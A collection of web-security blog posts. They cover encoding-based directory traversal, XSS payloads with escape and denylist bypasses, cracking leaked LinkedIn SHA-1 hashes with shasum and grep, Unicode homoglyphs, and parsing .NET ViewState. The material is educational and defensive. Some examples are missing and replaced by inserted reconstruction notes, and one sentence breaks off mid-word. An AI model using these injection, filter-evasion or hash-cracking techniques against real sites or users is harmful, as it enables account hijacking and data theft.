
Normally, IIS knew enough to limit directory traversals to the document root. However, the %c0%af combination did not appear to be a path separator to the security check, which was unaware of the overlong UTF-8 encoding for the forward slash (/). Thus, IIS received the URL, accepted the path, decoded the characters, then served the resource.

Unchecked data transformation also leads to HTML injection vulnerabilities when the app doesn’t normalize data consistently upon input or encode it properly for output. For example, %22 is a perfectly safe encoding for an href value. But if the %22 is decoded and the href’s value created with string concatenation, then it’s a short step to busting the app’s HTML. Normalization needs to be done carefully to avoid security weaknesses.

TOCTOU problems are usually discussed in terms of file system race conditions, but there’s no reason to limit the concept to file states. Reading source code can be as difficult as decoding Cocteau Twins lyrics. But you should still review your app for important state changes or data transformations and consider whether security controls are sufficient against attacks like input validation bypass, replay, or repudiation:

  • What happens between a security check and a state change?
  • Is the resource a “global”? How are concurrent read/writes handled?
  • How long does the resource live? Is it checked throughout its lifetime, or only on first use?
  • When is data considered tainted?
  • When is it considered safe?
  • When is it normalized?
  • When is it encoded?

January was named after the Roman god Janus. As you look ahead to the new year, consider looking back at your code for situations where TOCTOU problems might occur.

HIQR for the SPQR

Friends, Romans, visitors, lend me your eyes. I’ve added an HTML injection quick reference (HIQR) to the site. It’s not in iambic pentameter, but there’s a certain rhythm to the placement of quotation marks, less-than signs, and alert() functions.

For those unfamiliar with HTML injection (or cross-site scripting in the vulgate), it’s a vulnerability that enables an attacker to modify a page in order to affect the behavior of a victim’s browser. As the name suggests, the attacker injects markup or JavaScript, usually via a form field or querystring parameter, into a string that is then re-displayed by the app. In the worst cases, the app delivers malicious content to anyone who visits the infected page. Insecure string concatenation is the most common programming error that leads to this flaw.

Imagine an app that permits users to write <img> tags in posts to show off cute pictures of spiders. The app expects users to add images with src attributes that point anywhere on the web. For example,

<img src="">

Were users of the app to limit themselves to nicely formed http: or https: schemes, all would be well in the world. However, there’s already trouble brewing in the form of javascript: schemes. For example, a malicious user could inject arbitrary JavaScript into the page – a dangerous situation considering the JavaScript will be executing within the Same Origin Policy of the web app.

<img src="javascript:alert(9)">

Then there’s the trouble with attributes. Even if the site restricted schemes to http: or https:, a (not-at-all) devious hacker could add an inline event handler, for example,

<img src="https://web.site/spider.png" onload="alert(9)">

Now the attacker has two ways of executing JavaScript in their victim’s browsers – javascript: schemes and event handlers.

There’s more. Suppose the app writes anything the user submits into the web page. We’ll even imagine that the app’s developers have decided to enforce an http: or https: scheme and they only allow visitors to define a src value. In order to be more secure, the web app writes the src value into an element that’s guaranteed to not have any event handlers. This is where string concatenation rears its ugly, insecure head. For example, the hacker submits the following src attribute:
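The submitted value is stripped here, but it can be inferred from the resulting markup:

```
https:"><script>alert(9)</script>
```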


The app pops this value into the src attribute and, presto!, a new element appears. Notice the two characters at the end of the line, ">. They were the intended end of the src attribute and <img> tag, but the hacker’s payload subverted them:

<img src="https:"><script>alert(9)</script>">

HTML injection attacks become increasingly complex depending on the context where the payload is rendered, the characters that are stripped or escaped by data validation filters, the patterns used to detect malicious payloads, and the encoding of the payloads and the page.

SPQR (Senātus Populusque Rōmānus) was the Latin abbreviation for the Senate and People of Rome. Read up on HTML injection and you’ll become SPQH (Senātus Populusque Haxxor) soon enough.


Escape from Normality

Any good John Carpenter fan knows the only way you’ll escape from New York is if Snake Plissken is there to get you out. When it comes to web security, don’t bother waiting around for Kurt Russell’s help. You’re on your own.

Maybe you read a book on web security. Maybe you even remembered some of it. Maybe all you know is how to use escape characters in JavaScript Strings. In any case, maybe you should make sure the maximum security application you’ve created is as strong as you think it is.

The setup is simple: An app has a search box; it accepts queries via parameter q of a form, and rewrites the input box’s value with a one-line JavaScript call. Using JavaScript seems a little more complicated than updating the <input> field’s value directly, which would be as trivial as the following (with “abc” as the search term):

<input id="searchResult" type="text" name="q" value="abc">

It’s not necessarily a bad idea to update the element’s value with JavaScript. Building HTML on the server with string concatenation is a notorious vector for XSS. Writing the value with JavaScript might be more secure than rebuilding the HTML every time because the assignment avoids several encoding problems. This works if you’re keeping the HTML static and trading JSON messages with the server.

On the other hand, if you move the server-side string concatenation from the <input> field to a <script> tag, then you’ve shifted the problem without stepping towards a solution. The <input> field’s value was delimited with quotation marks (“). The JavaScript code uses apostrophes (‘) to delimit the string.

<script type='text/javascript'>
document.getElementById('searchResult').value = 'abc';

Rather than strip apostrophes from the search variable’s value, the developers have decided to escape them with backslashes. Here’s how it’s expected to work when a user searches for abc’.

document.getElementById('searchResult').value = 'abc\'';

Escaping the payload’s apostrophe preserves the original string delimiters, prevents the JavaScript syntax from being manipulated, and blocks HTML injection attacks. So it seems. What if the escape is escaped? Say, by throwing in a backslash of your own to search for something like abc\'.

document.getElementById('searchResult').value = 'abc\\'';

The developers caught the apostrophe, but missed the backslash. When JavaScript tokenizes the string it sees the escape working on the second backslash instead of the apostrophe. This corrupts the syntax, as follows:

//            ⬇ end of string token
value = 'abc\\'';
//             ⬆ dangling apostrophe
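The flawed escaping logic can be reproduced in a few lines (a sketch; the article doesn’t show the real server-side code):

```javascript
// The developers' rule: backslash-escape apostrophes, and nothing else.
const escapeQuotes = s => s.replace(/'/g, "\\'");

// A search for abc' is neutralized as intended...
console.log(`value = '${escapeQuotes("abc'")}';`);   // value = 'abc\'';
// ...but abc\' escapes the escape, leaving a dangling apostrophe.
console.log(`value = '${escapeQuotes("abc\\'")}';`); // value = 'abc\\'';
```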

From here we just start throwing HTML injection payloads against the app. JavaScript interprets \\ as a single backslash, accepts the apostrophe as the string terminator, and parses the rest of our payload: abc\';alert(9)//

document.getElementById('searchResult').value = 'abc\\';alert(9)//';

JavaScript’s semantics are lovely from the hacker’s perspective. Here’s an example payload using the String concatenation operator (+) to glue the alert function to the value: abc\'%2balert(9)//

document.getElementById('searchResult').value = 'abc\\'+alert(9)//';

Or we could try a payload that uses the modulo operator (%) between the String and our alert.
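The payload and result are missing from the excerpt; with %25 as the URL-encoded %, searching for abc\'%25alert(9)// would reflect as (hypothetical reconstruction):

```
document.getElementById('searchResult').value = 'abc\\'%alert(9)//';
```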


Maybe the developers added the alert function to a denylist, e.g. a regex for alert\(, by checking for an opening parenthesis. Look up the function in the window object’s property list; this makes it look like a string:
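The example is missing here; bracket notation on window avoids the literal alert( sequence, e.g. a search for abc\'%2bwindow['alert'](9)// reflects as (hypothetical reconstruction):

```
document.getElementById('searchResult').value = 'abc\\'+window['alert'](9)//';
```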


What happens if the denylist contains the word alert altogether? Build the string character by character:
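Again the example is missing; String.fromCharCode spells out the name without ever writing it (hypothetical reconstruction):

```
document.getElementById('searchResult').value = 'abc\\'+window[String.fromCharCode(97,108,101,114,116)](9)//';
```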


By now we’ve turned an evasion of an escaped apostrophe into an exercise in obfuscation and filter bypasses. Check out the HIQR for more anti-regex patterns and JavaScript obfuscation techniques.

Let’s do a quick recap of some security concepts. In this case, the clear mistake was forgetting all the permutations of escape sequences in a JavaScript string. Here’s an additional checklist:

  • Normalize the data, whether this entails character set conversion, character encoding, substitution, or removal.
  • Apply security checks, preferring inclusion lists over exclusion lists (it’s a lot easier to guess what’s safe than assume what’s dangerous).
  • In the design phase, be suspicious of string concatenation. Figure out if there’s a safer method to bind user-supplied data to HTML.
  • In the design phase, make sure your security check’s assumptions match the context where the data will be written.

Normalization is an important first step. Any time you transform data you should reapply security checks. Snake Plissken was never one for offering advice. Instead, think of The Hitchhiker’s Guide to the Galaxy and recall Trillian’s report as the Infinite Improbability Drive powers down (p. 61):

“…we have normality, I repeat we have normality….Anything you still can’t cope with is therefore your own problem.”

Good luck with normality, and trying to escape the right characters. Security isn’t certain, but one thing is, at least according to Queen. There’s “no escape from reality.”

Password Interlude in D Minor

While at least one previous post here castigated poor password security, a few others have tried to approach the problem in a more constructive manner. Each of these posts shares fundamental themes:

  • Protect the password in transit from the threat of sniffers or intermediation attacks – Use HTTPS during the entire authentication process. HSTS is better. HSTS plus DNSSEC is best.
  • Protect the password in storage to impede the threat of brute force guessing – Never store the plaintext version of the password. Store the salted hash, preferably with PBKDF2. Where possible, hash the password in the browser to further limit the plaintext version’s exposure and minimize developers’ temptation or expectation to work with plaintext. Hashing affects the amount of effort an attacker must expend to obtain the original plaintext password, but it offers little protection for weak passwords. Passwords like [email protected] or lettheright1in are going to be guessed quickly.
  • Protect the password storage from the threat of theft – Balance the attention to hashing passwords with attention to preventing them from being stolen in the first place. This includes (what should be) obvious steps like fixing SQL injection as well as avoiding surprises from areas like logging (such as the login page requests, failed logins), auditing (where password “strength” is checked on the server), and ancillary storage like backups or QA environments.

Implementing PBKDF2 for password protection requires two choices: an HMAC function and number of iterations. For example, WPA2 uses SHA-1 for the HMAC and 4,096 iterations. A review of Apple’s OS X FileVault 2 (used for full disk encryption) reveals that it relies in part on at least 41,000 iterations of SHA-256. RFC 3962 provides some insight, via example, of how to select an iteration count. It’s a trade-off between inducing overhead on the authentication system (authentication still needs to be low-latency from the user’s perspective, and too much time exposes it to easy DoS) versus increasing an attacker’s work effort.

A more sophisticated approach that I haven’t covered yet is the Secure Remote Password (SRP) protocol. SRP introduces a mechanism for password authentication and key exchange, making it a more secure way to protect the authentication process from passive (e.g. sniffing) and active (e.g. replay, spoofing) attacks. However, the nature of browser security, especially the idea of crypto implemented in JavaScript, adds some interesting wrinkles to the practical security of SRP – not enough to dismiss SRP, just to understand how DNS, mixed-content, and JavaScript’s execution environment may have adverse effects. That’s a topic for another day.

Finally, sites may choose to avoid password management altogether by adopting strategies like OAuth or OpenID. Taking this route doesn’t magically make password-related security problems disappear. Rather than specifically protecting passwords, a site must protect authentication and authorization tokens; it’s still necessary to enforce HTTPS and follow secure programming principles. However, the dangers of direct compromise of a user’s password are greatly reduced.

The state of password security is a sad subject. Like D minor, which is the saddest of all keys.

LinkedIn, HashedOut

Linked-“Be great at what you do”-In, bringing you modern social networking with less than modern password protection – about 1970s UNIX modern. The passwords in this dump not only rejected a robust, well-known password hashing scheme like PBKDF2, they didn’t even salt the passwords. As a historical reference, salts are something FreeBSD introduced around 1994.

It also appears some users are confused as to what constitutes a good password. Length? Characters? Punctuation? Phrases? An unfortunate number of users went for length, but couldn’t be bothered hitting the shift key, space bar, or one of those numbers above qwerty. I sat down for 20 minutes with shasum and grep – and my bookshelf for inspiration – to guess some possible passwords without resorting to a brute-force dictionary crack.

grep `echo -n myownpassword | shasum | cut -c6-40` SHA1.txt

The grep/shasum trick works on Unix-like command lines. John the Ripper is the usual tool for password cracking without entering the super assembly of GPU customization. And if someone tells you to use node.js instead of Perl, Python, Ruby, or that grep command because a non-blocking IO is faster…just walk away. Walk. Away. Your brain will thank you.

Anyway, I love sci-fi and fantasy as much as the next person. I still run an RPG on a weekly basis; there’s no dust on my polyhedrals. Speaking of RPGs, I started the guesswork with 1st Edition AD&D terms only to strike out after a dozen tries, but your 2nd edition references aren’t bad:

waterdeep – Undermountain was awesome, unlike your password.

menzoberranzan – Yeah, mister dual-scimitars shows up in the list, too. This single-handedly killed the Ranger class for me. (Er, not before I had about three Rangers with dual longswords; ‘cause that was totally different…)

No one seems to have taken “1stEditionAD&D”. Maybe that’ll be my new password – 14 characters, a number, a symbol, what’s not to love? Aside from this retroactive revelation?

tardis – Come on, that’s not even eight characters. Would tombaker or jonpertwee approve? I don’t think so. But no William Hartnell? Have you no sense of history? Even for a Time Lord?

doctorwho – Longer, but…um…we just covered this.

badwolf – Cool, some Jack Harkness fans out there, but still not eight characters.

torchwood – Love the show, but your anagram improves nothing.

kar120c – I’m glad there’s a Prisoner fan out there. It was a cool series with a mind-blowingly bizarre, pontificating, intriguing ending that demands discussion. However, not only is that password short, it even shows up in my book (upcoming edition, too). I should find out who it was and send them a signed copy.

itsatrap – Seriously? You chose a cliched, meme-inducing movie quote that short? And you couldn’t be bothered with an exclamation point at the end? At least you chose a line from the best of the three movies. (No, the last three aren’t worth considering. And, yes, they’re the “last” three because it’s only an “e” away from “least.”)

myprecious – Not anymore.

onering – Onering? While you were out onering your oner a password cracker was cracking your comprehension of LotR. By the way, hackers have also read earthsea, theshining and darktower. Hey, they’ve got good taste.

I adore the Dune books. Dune is in the top list of my favorite books. Seems I’m not the only fan:

benegesserit – Don’t they have some other quotes? Something about fear?

fearisthemindkiller – Heh, even the hackers hadn’t cracked that one yet. Referencing The Litany Against Fear would have been a nice move except that if “fear is the mind killer” then “obvious is the password.”

entersandman, blackened, dyerseve – What are you going to do when you run out of Metallica tracks? Use megadeath? It’s almost sadbuttrue. And jethrotull beat them at the Grammys. So, there.

loveiskind – Love is patient, love is kind, hackers aren’t stupid, passwords they find.

h4xx0r – No, probably not.

notmypassword – Actually, it is. At least you didn’t choose a 14-character secretpassword. That would just be dumb.

stevejobs – Now how is he going to change his password?


Music has a universal appeal uninhibited by language. A metal head in Istanbul, Tokyo, or Oslo instinctively knows the deep power chords of Black Sabbath – it takes maybe two beats to recognize a classic like “N.I.B.” or “Paranoid.” The same guitars that screamed the tapping mastery of Van Halen or led to the spandex hair excess of ’80s metal also served The Beatles and Pink Floyd. And before them was Chuck Berry, laying the groundwork with the power chords of “Roll Over Beethoven”.

And all this with six strings and five notes: E - A - D - G - B - E. Awesome.

And then there’s the writing on the web. Thousands of symbols, 8 bits, 16 bits, 32 bits. With ASCII, or US-ASCII as RFC 2616 puts it. Or rather ISO-8859-1. But UTF-8 is easier because it’s like an extended ASCII. On the other hand if you’re dealing with GB2312 then UTF-8 isn’t necessarily for you. Of course, in that case you should really be using GBK instead of GB2312. Or was it supposed to be GB18030? I can’t remember.

What a wonderful world of character encodings can be found on the web. And confusion. Our metal head friends like their own genre of müzik / 音楽 / musikk. One word, three languages, and, in this example, one encoding: UTF-8. Programmers need to know programming languages, but they don’t need to know different spoken languages in order to work them into their web sites correctly and securely. (And based on email lists and flame wars I’ve seen, rudimentary knowledge in one spoken language isn’t a prerequisite for some coders.)

You don’t need to speak the language in order to work with its characters, words, and sentences. You just need Unicode. As some random dude (not really) put it, “The W3C was founded to develop common protocols to lead the evolution of the World Wide Web. The path W3C follows to making text on the Web truly global is Unicode. Unicode is fundamental to the work of the W3C; it is a component of W3C Specifications, from the early days of HTML, to the growing XML Family of specifications and beyond.”

Unicode has its learning curve. With Normalization Forms. Characters. Code Units. Glyphs. Collation. And so on. The gist of Unicode is that it’s a universal coding scheme to represent all characters used for written language, present and future; hopefully never to be eclipsed.

The security problems of Unicode stem from the conversion from one character set to another. When home-town fans of 少年ナイフ want to praise their heroes in a site’s comment section, they’ll do so in Japanese. Yet behind the scenes, the browser, web site, or operating systems involved might be handling the characters in UTF-8, Shift-JIS, or EUC.

The conversion of character sets introduces the chance for mistakes and broken assumptions. The number of bytes might change, leading to a buffer overflow or underflow. The string may no longer be the C-friendly NULL-terminated array. Unsupported characters cause errors, possibly leading an XSS filter to skip over a script tag. A lot of these concerns have been documented. Some have even been demonstrated as exploitable vulns in the real world (as opposed to conceptual problems that run rampant through security conferences, but never see a decent hack).
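A small Node sketch of the byte-count problem; the same two characters occupy different byte lengths under different encodings, so a length check done before conversion can break after it:

```javascript
var jp = '音楽'; // "music": two characters

var utf8 = Buffer.from(jp, 'utf8');
var utf16 = Buffer.from(jp, 'utf16le');

console.log(jp.length);    // 2 characters
console.log(utf8.length);  // 6 bytes in UTF-8
console.log(utf16.length); // 4 bytes in UTF-16
```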

Unicode got more popular scrutiny when it was proposed for Internationalized Domain Names (IDN). Researchers warned of “homoglyph” attacks, situations where phishers or malware authors would craft URLs that used alternate characters to spoof popular sites. The first attacks didn’t need IDNs, using trivial tricks like (replacing the letter L with a one, 1). However, IDNs provided more sophistication by allowing domains with harder-to-detect changes like deạ
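The pạypal string below is a hypothetical homoglyph along those lines; Unicode normalization offers a crude way to expose the lookalike (a sketch only – real detection relies on Unicode’s confusables data, not a regex):

```javascript
var spoofed = 'p\u1EA1ypal'; // 'ạ' (U+1EA1) masquerading as 'a'

// NFD decomposes 'ạ' into 'a' plus a combining dot below (U+0323); stripping
// combining marks reveals the string being imitated:
var skeleton = spoofed.normalize('NFD').replace(/[\u0300-\u036f]/g, '');

console.log(spoofed === 'paypal');  // false: they only look alike
console.log(skeleton === 'paypal'); // true once the mark is stripped
```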

What hasn’t been well documented (or at least not where I could find it) is the range of support for character set encodings in security tools. The primary language of web security seems to be English (at least based on the popular conferences and books). But useful tools come from all over. Wivet originated from Türkiye (here’s some more UTF-8: Web Güvenlik Topluluğu), but it goes easy on scanners in terms of character set support. Sqlmap and w3af support Unicode. So, maybe this is a non-issue for modern tools.

In any case, it never hurts to have more “how to hack” tools in non-English languages or test suites to verify that the latest XSS finder, SQL injector, or web tool can deal with sites that aren’t friendly enough to serve content as UTF-8. Or you could help out with documentation projects like the OWASP Development Guide. Don’t be afraid to care. It would be disastrous if an anti-virus, malware detector, WAF, or scanner was tripped up by encoding issues.

Sometimes translation is really easy. The phrase for “heavy metal” in French is “heavy metal” – although you’d be correct to use “Métal Hurlant” if you were talking about the movie. Character conversion can be easy, too. As long as you stick with a single representation. Once you start to dabble in the Unicode conversions from UTF-8, UTF-16, UTF-32, and beyond you’ll be well-served by keeping up to date on encoding concerns and having tools that spare you the brain damage of implementing everything from scratch.

Parsing .NET ViewState

The JavaScript-based parser has been moved to a github repository.

Background on parsing unencrypted ViewState is in A Spirited Peek into ViewState, Part I, followed by Part II.

.NET ViewState Byte Sequences

Byte(s) Explanation
0x02 […] Unsigned integer, compose value from 7 bits of each following byte until leading 8th bit equals 0.
0x0201 == 00000010 00000001 == 1  
0x027f == 00000010 01111111 == 127  
0x028101 == 00000010 10000001 00000001 == 1 + (1 << 7) == 129  
0x02a1b22a == 00000010 10100001 10110010 00101010 == 33 + (50 << 7) + (42 << 14) == 694561  
0x03 [length] […] Container of [length] Booleans
0x05 [length] […] String, a container of [length] bytes
0x09 RGBA component
0x0B […] 0x00 String, usually NULL-terminated, i.e. read bytes until 0x00.
0x0f Pair (tuple of two objects)
0x10 Triplet (tuple of three objects)
0x15 [length] Array of strings
0x16 [length] Container of objects
0x18 Control state
0x1b [12 bytes] Unit
0x1e [length] […] String (identical to 0x05)
0x1f [number] String reference
0x24 [36 bytes] UUID
0x64 empty node
0x65 empty string
0x66 Number 0
0x67 Boolean true
0x68 Boolean false
0xff01 ViewState preamble
Notes: The number of elements in a container is defined by [length], which is one or more bytes interpreted as a number in the manner of 0x02.
A container may be empty, i.e. [length] is 0x00.  
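The 0x02 rule can be sketched in a few lines of JavaScript (the arrays hold the bytes that follow the 0x02 marker):

```javascript
// Accumulate 7 bits from each byte until a byte's high (8th) bit is clear.
function decodeViewStateUInt(bytes) {
    var n = 0, shift = 0, i = 0, b;
    do {
        b = bytes[i++];
        n += (b & 0x7f) << shift;
        shift += 7;
    } while (b > 0x7f);
    return n;
}

console.log(decodeViewStateUInt([0x7f]));       // 127
console.log(decodeViewStateUInt([0x81, 0x01])); // 1 + (1 << 7) == 129
```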

Will the Real APT Please Stand Up?

The Advanced Persistent Threat (APT) is now competing with Cyberwar for reign as security word(s) of the year. It would have been nice if we had given other important words like HTTPS or Prepared Statements their chance to catch enough collective attention to drive security fixes. Alas, we still deal with these fundamental security problems due to Advanced Persistent Ignorance. It’s not wrong to seek out examples of APT, but it helps to have an idea about its nature. Otherwise, we risk seeing the APT boogeyman everywhere.

Threats have agency. They are persons (or even natural events like earthquakes and tsunamis) that take action against your assets (information, network, etc.). An XSS vulnerability in an email site isn’t a threat – the person trying to hijack your account with it is. With this in mind, the term APT helpfully self-describes two important properties:

  • the threat is persistent
  • the threat is advanced

Persistence is uncomplicated. The threat actor has a continuous focus on the target. This doesn’t mean around-the-clock port scanning just waiting for an interesting port to pop up. It means active collection of data about the target as well as development of tools, techniques, and plans once a compromise is attained. Persistent implies patience in searching for “simple” vulns and enumerating resources vulnerable to more sophisticated exploits.

A script-kiddie joyriding the Internet with sqlmap or metasploit looking for anything to attack may be persistent, but the persistence is geared towards finding a vuln rather than finding a vuln in a specific target. It’s the difference between a creepy guy stalking his ex versus a creepy guy hanging out in a bar waiting for someone to get really drunk.

The advanced aspect of a threat leads to more confusion than its persistent aspect. An advanced threat may still exploit simple vulns (e.g. SQL injection). The advanced nature need not even be the nature of the exploit (e.g. using a tool like sqlmap). What may be advanced is the leverage of the exploit. Remember, the threat agent most likely wants to do more than grab passwords from a database. With passwords in hand it’s possible to reach deeper into the target network, steal information, cause disruption, and establish more permanent access than waiting for another buffer overflow to appear.

Stolen passwords are one of the easiest backdoors and the most difficult to detect. Several months ago RSA systems were hacked. Enough information was allegedly stolen that observers at the time imagined it would enable attackers to spoof or otherwise attack SecurID tokens and authentication schemes.

Now it seems those expectations have been met with not one, but two major defense contractors reporting breaches that apparently used SecurID as a vector.

At this point I’m out of solid technical examples of APT. But I don’t want you to leave without a good understanding of what an insidious threat looks like. Let’s turn to the metaphor and allegory of television influenced by the Cold War.

Specifically, The Twilight Zone season 2, episode 28, “Will the Real Martian Please Stand Up” written by the show’s creator, Rod Serling.

Spoilers ahead. I insist you watch the episode before reading further. It’ll be 25 minutes of entertainment you won’t regret.

The set-up of the show is that a Sheriff and his deputy find possible evidence of a crashed UFO, along with very human-like footprints leading from the forested crash site into town.

The two men follow the tracks to a diner where a bus is parked out front. They enter the diner and start to ask if anyone’s seen someone suspicious. You know, like an alien. The bus driver explains the bus is delayed by the weather and they had just stopped at the diner. The lawmen scan the room, “Know how many you had?”


In addition to the driver and the diner’s counterman, Haley, there are seven people in the diner. Two couples, a dandy in a fedora, an old man, and a woman. Ha! Someone’s a Martian in disguise!

What follows are questions, doubt, confusion, and a jukebox. With no clear evidence of who the Martian may be, the lawmen reluctantly give up and allow everyone to depart. The passengers reload the bus.1 The sheriff and his deputy leave. The bus drives away.

But this is the Twilight Zone. It wouldn’t leave you with such a simple parable of paranoia; there’s always a catch.

The man in the fedora and overcoat, Mr. Ross, returns to the diner. He laments that the bus didn’t make it across the bridge. (“Kerplunk. Right into the river.”)

Dismayed, he sits down at the counter, cradling a cup of coffee in his left hand. The next instant, with marvelous understatement, he pulls a pack of cigarettes from his overcoat and extracts a cigarette – using a third hand to retrieve some matches.

We Martians (he explains) are looking for a nice remote, pleasant spot to start colonizing Earth.

Oh, but we’re not finished. Haley nods at Mr. Ross’ story. You see, the inhabitants of Venus thought the same thing. In fact, they’ve already intercepted and blocked Ross’s Martian friends in order to establish a colony of their own. Haley smiles, pushing back his diner hat to reveal a third eye in his forehead.

That, my friends, is an advanced persistent threat!

  1. The server rings up their bills, charging one of them $1.40 for 14 cups of coffee. I’m not sure which is more astonishing – drinking 14 cups or paying 10 cents for each one. 

A Spirited Peek into ViewState, Part II

Our previous article started with an overview of the ViewState object. It showed some basic reverse engineering techniques to start deconstructing the contents embedded within the object. This article broaches the technical aspects of implementing a parser to automatically pull the ViewState apart.

We’ll start with a JavaScript example. The code implements a procedural design rather than an object-oriented one. Regardless of your design preference, JavaScript enables either method.

The ViewState must be decoded from Base64 into an array of bytes. First, we’ll take advantage of browsers’ native atob and btoa functions rather than re-implement the Base64 routines in JavaScript. Second, we’ll use the ArrayBuffer data type rather than JavaScript’s String or Array objects to store the unencoded ViewState. Using ArrayBuffer isn’t necessary, but it provides a more correct data type for dealing with 8-bit values.

Here’s a function to turn the Base64 ViewState into an array of bytes in preparation of parsing:

function analyzeViewState(input) {
    var rawViewState = atob(input);
    var rawViewStateLength = rawViewState.length;
    var vsBytes = new Uint8Array(new ArrayBuffer(rawViewStateLength));

    for (var i = 0; i < rawViewStateLength; ++i) {
        vsBytes[i] = rawViewState.charCodeAt(i);
    }

    if (vsBytes[0] == 0xff && vsBytes[1] == 0x01) { // okay to continue, we recognize this version
        var pos = 2;
        while (pos < vsBytes.length) {
            pos = parse(vsBytes, pos);
        }
    }
    else {
        document.writeln("unknown format");
    }
}

The parse function will basically be a large switch statement. It takes a ViewState buffer, the current position in the buffer to analyze (think of this as a cursor), and returns the next position. The skeleton looks like this:

function parse(bytes, pos) {
    switch (bytes[pos]) {
        case 0x64: // EMPTY
            ++pos;
            break;
        default: // unknown byte
            ++pos;
            break;
    }
    return pos;
}

If you recall from the previous article, strings were the first complex object we ran into. But parsing a string also required knowing how to parse numbers. This is the function we’ll use to parse numeric values. The functional approach coded us into a bit of a corner because the return value needs to be an array that contains the decoded number as an unsigned integer and the next position to parse (we need to know the position in order to move the cursor along the buffer):

function parseUInteger(bytes, pos) {
    var n = bytes[pos] & 0x7f;

    if (bytes[pos] > 0x7f) {
        var m = (bytes[++pos] & 0x7f) << 7;
        n += m;

        if (bytes[pos] > 0x7f) {
            m = (bytes[++pos] & 0x7f) << 14;
            n += m;
        }
    }

    return [n, pos + 1];
}

With the numeric parser created we can update the switch statement in the parse function:

function parse(bytes, pos) {
    var r = [0, 0];
    switch (bytes[pos]) {
        case 0x02:
            r = parseUInteger(bytes, pos + 1); // skip past the 0x02 marker
            pos = r[1];
            document.writeln("number: " + r[0]);
            break;
    }
    return pos;
}

Next up is parsing strings. We know the format is 0x05, followed by the length, followed by the “length” number of bytes. Now add this to the switch statement:

switch (bytes[pos]) {
    case 0x05:
        r = parseUInteger(bytes, pos + 1); // skip past the 0x05 marker
        var size = r[0];
        pos = r[1];
        var s = parseString(bytes, pos, size);
        pos += size;
        document.writeln("string (" + size + "): " + s);
        break;
}

The parseString function will handle the extraction of characters. Since we know the length of the string beforehand it’s unnecessary for parseString to return the cursor’s next position:

function parseString(bytes, pos, size) {
    var s = "";

    for (var i = pos; i < pos + size; ++i) {
        s += String.fromCharCode(bytes[i]);
    }

    return s;
}

We’ll cover two more types of objects before moving on to an alternate parser. A common data type is the Pair. As you’ve likely guessed, this is an object that contains two objects. It could also be called a tuple that has two members. The Pair is easy to create. It also introduces recursion. Update the switch statement with this:

switch (bytes[pos]) {
    case 0x0f:
        ++pos; // step past the 0x0f marker
        pos = parse(bytes, pos); // member 1
        pos = parse(bytes, pos); // member 2
        break;
}

More containers quickly fall into place. Here’s another that, like strings, declares its size, but unlike strings may contain any kind of object:

switch (bytes[pos]) {
    case 0x16:
        r = parseUInteger(bytes, pos + 1); // skip past the 0x16 marker
        var size = r[0];
        pos = r[1];
        document.writeln("array of objects (" + size + ")");
        for (var i = 0; i < size; ++i) {
            pos = parse(bytes, pos);
        }
        break;
}
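Stitched together, the snippets make a runnable toy (a sketch: Node.js assumed, console.log standing in for document.writeln, and the byte sequence below is hand-built). It walks a preamble followed by a Pair holding a three-byte String and an empty node:

```javascript
// 7-bits-per-byte integer decoder, as above.
function parseUInteger(bytes, pos) {
    var n = 0, shift = 0, b;
    do {
        b = bytes[pos++];
        n += (b & 0x7f) << shift;
        shift += 7;
    } while (b > 0x7f);
    return [n, pos];
}

var strings = []; // collect parsed strings for inspection

function parse(bytes, pos) {
    var r;
    switch (bytes[pos]) {
        case 0x02: // unsigned integer
            r = parseUInteger(bytes, pos + 1);
            console.log("number: " + r[0]);
            return r[1];
        case 0x05: // string: [length] then that many bytes
            r = parseUInteger(bytes, pos + 1);
            var s = "";
            for (var i = r[1]; i < r[1] + r[0]; ++i) {
                s += String.fromCharCode(bytes[i]);
            }
            strings.push(s);
            console.log("string (" + r[0] + "): " + s);
            return r[1] + r[0];
        case 0x0f: // Pair: two objects
            pos = parse(bytes, pos + 1); // member 1
            return parse(bytes, pos);    // member 2
        case 0x64: // empty node
            return pos + 1;
        default:
            throw new Error("unknown byte at position " + pos);
    }
}

// 0xff 0x01 preamble, then Pair( String "abc", empty node )
var vsBytes = [0xff, 0x01, 0x0f, 0x05, 0x03, 0x61, 0x62, 0x63, 0x64];
var cursor = 2; // skip the preamble
while (cursor < vsBytes.length) {
    cursor = parse(vsBytes, cursor);
}
```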

From here you should have an idea of how to expand the switch statement to cover more and more objects. You can use this page as a reference. JavaScript’s capabilities exceed the simple functional approach of these previous examples; it can handle far more robust methods and error handling. Instead of embellishing that code, let’s turn our text editor towards a different language: C++.

Diving into C++ requires us to start thinking about object-oriented solutions to the parser, or at least concepts like STL containers and iterators. You could very easily turn the previous JavaScript example into C++ code, but you’d really just be using a C++ compiler against plain C code rather than taking advantage of the language.

In fact, we’re going to take a giant leap into the Boost.Spirit library. The Spirit library provides a way to create powerful parsers using clear syntax. (Relatively clear despite one’s first impressions.) In Spirit parlance, our parser will be a grammar composed of rules. A rule will have attributes related to the data type it produces. Optionally, a rule may have an action that executes arbitrary code.

Enough delay. Let’s animate the skeleton of our new grammar. The magic of template meta-programming makes the following struct valid and versatile. Its whys and wherefores may be inscrutable at the moment; however, the gist of the parser should be clear and, if you’ll forgive some exaltation, quite elegant in terms of C++:

template <typename Iterator> struct Grammar : boost::spirit::qi::grammar<Iterator> {
    Grammar() : Grammar::base_type(start) {
        using boost::spirit::qi::byte_;

        empty = byte_(0x64);
        object = empty | pair;
        pair = byte_(0x0f) >> object >> object;
        version = byte_(0xff) >> byte_(0x01);
        start = version // must start with recognized version
            >> +object; // contains one or more objects
    }

    qi::rule<Iterator> empty, object, pair, start, version;
};

We haven’t put all the pieces together for a complete program. We’ll put some more flesh on the grammar before unleashing a compiler on it. One of the cool things about Spirit is that you can compose grammars from other grammars. Here’s how we’ll interpret strings. There’s another rule with yet another grammar we need to write, but the details are skipped. All it does is parse a number (see the JavaScript above) and expose the value as the attribute of the UInteger32 rule.1 The following example introduces two new concepts, local variables and actions:

template <typename Iterator> struct String : boost::spirit::qi::grammar<Iterator, qi::locals<unsigned> > {
    String() : String::base_type(start) {
        using boost::spirit::qi::byte_;
        using boost::spirit::qi::omit;
        using boost::spirit::qi::repeat;
        using namespace boost::spirit::qi::labels;

        start = omit[ (byte_(0x05) | byte_(0x1e))
            >> length[ _a = _1 ] ]
            >> repeat(_a)[byte_] ;
    }

    UInteger32<Iterator> length;
    qi::rule<Iterator, qi::locals<unsigned> > start;
};

